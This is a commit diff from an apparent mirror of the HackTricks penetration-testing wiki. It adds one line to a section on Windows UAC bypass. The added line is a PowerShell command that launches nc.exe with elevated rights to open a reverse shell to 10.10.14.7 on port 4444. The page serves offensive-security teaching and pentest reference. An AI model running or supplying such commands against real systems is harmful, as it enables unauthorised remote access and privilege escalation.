mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent
43497ff855
commit
4dcbfbb4c8
1 changed files with 1 additions and 0 deletions
|
@ -141,6 +141,7 @@ If UAC is already disabled \(**`ConsentPromptBehaviorAdmin`**is **`0`**\) you ca
|
|||
```bash
|
||||
#Put your reverse shell instead of "calc.exe"
|
||||
Start-Process powershell -Verb runAs "calc.exe"
|
||||
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
|
||||
```
|
||||
|
||||
#### UAC bypass exploits
|
||||
|
|
Loading…
Reference in a new issue